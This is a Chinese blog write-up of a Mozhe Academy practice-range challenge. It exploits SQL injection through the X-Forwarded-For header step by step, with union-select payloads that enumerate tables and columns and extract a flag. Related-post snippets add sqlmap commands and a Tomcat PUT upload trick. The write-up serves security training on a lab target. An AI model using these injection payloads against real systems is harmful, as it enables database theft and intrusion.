墨者学院-在线靶场-HTTP头注入漏洞测试(X-Forwarded-for) Writeup

最新推荐文章于 2024-07-23 01:29:17 发布
最新推荐文章于 2024-07-23 01:29:17 发布
阅读量834 收藏 1
点赞数
分类专栏: Writeup 文章标签: 墨者学院
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/s0mor/article/details/98964748
版权

首先题目提示

XFF注入,大致思路为Burp抓包添加XFF请求头进行注入。
启动靶场
点击进入墨者的任性网页

Burpsuite抓包,放进Repeater

先GO一下
在这里插入图片描述
在请求头中添加X-Forwarded-For
试了试 'and 1=1and 1=2都没反应
当改为or 1=1时,提示语法错误
在这里插入图片描述
在这里插入图片描述
继续,union注入步骤

order by 5显示未知字段,order by 4返回正常

得到数据库中的字段数

在这里插入图片描述
在这里插入图片描述

union select 1,2,3,4

看看有哪些回显点,发现多了一行商品,名称,价格,数量分别为2,3,4
在这里插入图片描述
在这里插入图片描述
爆数据库版本和数据库名

union select 1,2,version(),database()

在这里插入图片描述
在这里插入图片描述

union select 1,2,(select table_name from information_schema.tables where table_schema = 'pentesterlab' limit 0,1),database()

第一个表名为comment

union select 1,2,(select table_name from information_schema.tables where table_schema = 'pentesterlab' limit 1,1),database()

在这里插入图片描述
在这里插入图片描述
第二个表名为flag,应该是这个表了。

继续

union select 1,2,(select column_name from information_schema.columns where table_name = 'flag' limit 0,1),database()

第一个字段名为id,再试试第二个

union select 1,2,(select column_name from information_schema.columns where table_name = 'flag' limit 1,1),database()

在这里插入图片描述
flag应该就在这个字段中

union select 1,2,(select flag from pentesterlab.flag limit 0,1),database()

得到flag
在这里插入图片描述
回到最初页面,验证flag,得到key。
在这里插入图片描述
在这里插入图片描述

s0mor
关注
专栏目录
墨者学院-HTTP注入漏洞测试(X-Forwarded-for)-手工注入
mutou990的博客
08-03 1590
一、审题 这题从题目,也可以看放包后的回显可以知道是http的ip注入,尝试(题目有说)x-forwarded-for(这里的注入我很难主动想到,因为在原始的http里没有x-forwarded-for,这题是题目有提醒) 二、判断类型 使用brupsuit抓包,repeater后添加XFF ——X-Forwarded-For: 通过修改X-Forwarded-For:值来找出注入点。 当值为"(双引号)时,X-Forwarded-For:" 不报错; 当值为‘’(单引号)时,X-Forwarded
墨者学院HTTP注入漏洞测试(X-Forwarded-for)
qq_43817824的博客
07-24 1240
打开靶场环境,查看网页源代码,发现flag.php是进入墨者的任性首页。 设置网页代理,进入墨者的任性网页,打开Burp Suite ,抓包,右键发送给repeater,自己填入X-Forwarded-For,然后判断是否可注入。 3.order by 判断表数量,最后发现是4 4.union select 1,2,3,4测试注入点的位置是在4,通过union select 1,2,3,(...
墨者学院(4个sql靶场攻略)
最新发布
a96482的博客
07-23 1124
首先我们要购买并启动靶场点击访问跳转页面,获得KEY后在这里提交该题提示POST方式提交,我们需要通过burpsuite抓包在name后加单引号测试发现有sql注入,那我们就按照sql手工注入流程来这里发现联合注入(name='1 union select 1,2,3 #)直接得出KEY最后提交KEY完成。
墨者学院在线靶场writeup
john_david_的博客
02-14 5221
入门 WEB页面源代码查看 打开是一个HTML页面,鼠标右键被禁用,直接F12,控制台点Elements看源代码,就发现key了 WEB页面分析 打开靶场F12,看到注释,按照注释方法构造url,index.php?url=login.php,跳转拿到key 服务器返回数据查看 F12打开控制台,点击network,点击ip,点heards,然后展开response就可以看到key 浏览器信息伪造...
墨者学院——X-Forwarded-For注入漏洞实战writeUp
weixin_43862283的博客
12-24 373
墨者学院篇 X-Forwarded-For注入漏洞实战 实训目标 1、掌握SQL注入的基本原理; 2、了解服务器获取客户端IP的方式; 3、了解SQL注入的工具使用; 解题方向 对登录表单的各参数进行测试,找到SQL注入点,对数据库内容进行读取,找到账号与密码。 解题思路 判断注入点 爆破数据库 爆破数据表 爆破数据库列 爆破字段 将用户名秘密输入登录框,得到key CMS的URL ht...
mysql 注入 爆表_墨者学院 – SQL注入实战-MySQLWriteup
weixin_34847099的博客
02-01 218
两种解法一、利用sqlmap及其tamper模块base64encode使用1. 看到id后面的参数可能是base64加密后的结果,我们尝试解密,解密结果为12.查看当前的系统信息sqlmap -u "http://219.153.49.228:43371/show.php?id=MQo=" --tamper=base64encode3.暴库sqlmap -u "http://219.153.49...
墨者学院-X-Forwarded-For注入漏洞实战
weixin_42939822的博客
03-27 6354
墨者学院-X-Forwarded-For注入漏洞实战
墨者】X-Forwarded-For注入漏洞实战
weixin_48621644的博客
09-11 1326
小羊学安全 任重而道远 ~
在线靶场-墨者-WEB安全2星-HTTP注入漏洞测试(X-Forwarded-for)
weixin_42079912的博客
07-19 858
点击靶场网页,点击进入墨者的任性网站。然后浏览器挂代理。使用burp suite抓包,刷新墨者任性网站,在burp suite中抓到数据包,把数据包send to Repeater。使用order by 查出有4个字段。union select 1,2,3,4 回显位置。 所以在数据包中添加X-Forwarded-For: union select 1,2,3,group_concat(flag...
墨者学院 ——X-Forwarded-For注入漏洞实战
知足且坚定,温柔且上进
02-09 700
前言: 小白昨天在利用sqlmap注入的时候,死活不成功(连接超时),把我搞崩溃了,今天又试了一下还是如此。 当我把小飞机(科学上网)关了,再次尝试,成功了!所以如果和我有一样状况的新手们可要注意这个问题哦。 步骤一: 利用burpsuite抓包并且发送到reperter, 添加x-forwarded-for:* 1.将Request的Raw内容复制到自己新建的一个txt文档,命名为x...
web站点获取用户IP的安全方法 HTTP_X_FORWARDED_FOR检验
01-20
安全过滤后的getIP函数 复制代码 代码如下:  function getIP() { $realip = ”; //设置默认值 if (isset($_SERVER[‘HTTP_X_FORWARDED_FOR’])) {  $realip = $_SERVER[‘HTTP_X_FORWARDED_FOR’]; } elseif (isset($_SERVER[‘HTTP_CLIENT_IP’])) {  $realip = $_SERVER[‘HTTP_CLIENT_IP’]; } else {  $realip = $_SERVER[‘REMOTE_ADDR’]; }  preg_mat
漏洞靶场实战-Vuluhub medium_socnet
qq_53058639的博客
02-04 528
Vulnhub 是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地 VM 打开即可,但是很多靶场不兼容 Vmware 比如本次用的靶场就不兼容,所以推荐 VirtualBox下载的是一个 ovf 后缀的文件,打开 VirtualBox,导入导入完毕后根据需求编辑虚拟机设置。
墨者学院】X-Forwarded-For注入漏洞实战
hehigoxqc606的博客
08-31 906
墨者学院】X-Forwarded-For注入漏洞实战 漏洞原理: 利用HTTP注入、sqlmap注入等方式,爆破数据库表中的用户账号和密码,以登陆系统,很有可能对系统有下一步的破坏。 实战过程: 第一步:访问链接 第二步:抓取数据包,可以看到登陆失败,并提示登陆的IP地址 第三步:利用X-Forwarded-For伪装127.0.0.1进行测试 第四步:复制RAW文件到xff.txt中,这里构造的X-Forward...
HTTP 请求中的 X-Forwarded-For
宠辱不惊,闲看庭前花开花落;去留无意,漫随天外云卷云舒。
09-18 2274
转自:https://imququ.com/post/x-forwarded-for-header-in-http.html HTTP 请求中的 X-Forwarded-For 我一直认为,对于从事 Web 前端开发的同学来说,HTTP 协议以及其他常见的网络知识属于必备项。一方面,前端很多工作如 Web 性能优化,大部分规则都跟 HTTPHTTPS、SPDY 和
X-Forwarded-For注入漏洞实战
qq_36933272的博客
09-03 1895
浏览器设置代理,burp截断登陆请求的数据包 send to repeater,然后增加一行X-Forwarded-For:*,下一行留空 Go 保存response,改成txt文件 打开sqlmap,依次查出数据库、查询表名、查询列中的字段,如sqlmap -r txt文件路径 --dbs --batch(–batch 批处理,在检测过程中会问用户一些问题,使用这个参数统统使用默认值。) sql...
墨者学院09 X-Forwarded-For注入漏洞实战
weixin_42789937的博客
02-10 581
墨者学院09 X-Forwarded-For注入漏洞实战,参考大佬wp,对于显错注入整理了手工和sqlmap两种注入流程~
在线靶场-墨者-安全意识1星-PHP逻辑漏洞利用实战(第1题)
weixin_42079912的博客
07-18 367
首先先登录网站账号xiaoming密码123456,进去之后可以看到余额不足够买书籍,于是先打开浏览器代理,运行burp suite开始抓包,在两本书籍熟练处填上1,然后点击购买。把抓到的数据send to Repeater,然后修改数据bill1=0.5&bill2=0.5(两本书都改为0.5元),然后点击GO开始发送,反馈回来的信息是两本书都购买成功,两本书总价1元,余额剩下0,同时得...
墨者学院 - Tomcat 远程代码执行漏洞利用(第1题)
多崎巡礼的博客
09-17 1307
刷新fit网站 burp截包,repeater,更改不安全的HTTP方法为PUT(将get更改为options可查看服务器支持哪些) PUT /自定义文件名/ HTTP/1.1 eg:   PUT /9.jsp/ HTTP/1.1     (jsp后无空格,反之会报错) 添加以下代码 <%@ page language="java" import="java.util.*,ja...
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标网站进行攻击,以确定是否存在注入漏洞,并尝试获取敏感信息。 在手工注入的过程中,墨者安全团队通常会使用一些工具来辅助测试,例如Burp Suite、SQLMap等。同时,他们也会根据目标网站的具体情况进行一些自定义的测试,以提高测试效果。 总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值